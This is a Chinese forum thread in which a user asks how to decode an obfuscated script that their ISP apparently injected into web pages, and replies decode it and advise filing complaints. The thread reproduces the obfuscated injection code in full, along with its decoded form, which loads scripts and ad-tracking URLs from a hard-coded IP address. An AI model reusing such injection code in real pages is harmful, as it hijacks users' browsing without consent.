阅读:3195回复:5
我的firefox是不是被电信劫持了?
点击链接时,打开的是空白网页,刷新一下就正常了。看了看源代码,好像是加密了。
<script>var d="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;0072/239/324/37;9106/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0072/239/324/37;910d/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0072/239/324/37;9106/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!q>#iuuq;0072/239/324/37;910b0t@beje>311868'uddb>NEJ{O{J5OklxO{V>'vsjq>3531:7955'tqpsu>1'fqpsu>1'psmv>bIS1dEpwM4qpMoeqb3mx[XSqZT6";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="wdndwe3msbT:UdHWkbXGtPjWGOjV6NDV6RzWGOzWDODWCNk:{[XGzZ3h:[Y[iKoOweYKk[XmlQV2wfnmtcHFud3WidnOp'tqje>372774475'bsfb>216'ut>25293::763'bpsmv>bIS1dEpwM{ZyMkFzPD5zNUNvNkZ7PEBwNkBxO{V4Mx>>'q2bsn>378'q3bsn>411'q4bsn>1'q5bsn>6'q6bsn>26'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)q*#!pocfgpsfvompbe>#ttu)*#?=0cpez?=0iunm?";document.write(i(d,c));</script>这玩意怎么解码?我想确定这是不是被电信劫持了。 |
|
最新喜欢:fang55... |
1楼#
发布于:2014-12-11 21:05
不是加密,只是混淆一下
输出为: <html> <head> <link rel="stylesheet" type="text/css" href="http://61.128.213.26:80/5.css"> <script type="text/javascript" src="http://61.128.213.26:80/c.js"></script> <script type="text/javascript" src="http://61.128.213.26:80/5.js"></script> <script type="text/javascript"> var p = "http://61.128.213.26:80/a/s?adid=200757&tcca=MDIzNzI4NjkwNzU=&urip=242096844&sport=0&eport=0&orlu=aHR0cDovL3poLndpa2lwZWRpYS5vcmcvd2lraS9TcGVjaWFsOiVFNiU5MCU5QyVFNyVCNCVBMj9zZWFyY2g9ZXZhJnNvdXJjZWlkPU1vemlsbGEtc2VhcmNo&spid=261663364&area=105&ts=1418299652&aorlu=aHR0cDovLzYxLjEyOC4yMTMuMjY6ODAvMjAwNzU3Lw==&p1arm=267&p2arm=300&p3arm=0&p4arm=5&p5arm=15&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0"; </script> </head> <body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no onload="init(p)" onbeforeunload="sst()"></body> </html> 您查询的IP:61.128.213.26
电信http会话劫持妥妥的,先打10000号投诉,出示证据; 他们不处理就去工信部投诉:http://www.chinatcc.gov.cn:8080/cms/shensus/ |
|
|
2楼#
发布于:2014-12-12 09:36
|
|
3楼#
发布于:2014-12-12 13:10
charon0622:那段代码怎么读啊?可以自动转换吗?回到原帖这种解密很简单,把document.write换成alert然后运行就行了。 |
|
4楼#
发布于:2014-12-13 12:18
|
|
5楼#
发布于:2014-12-14 21:10
字符串简单加密了的。里面的函数 i 就是用来解密的。
|
|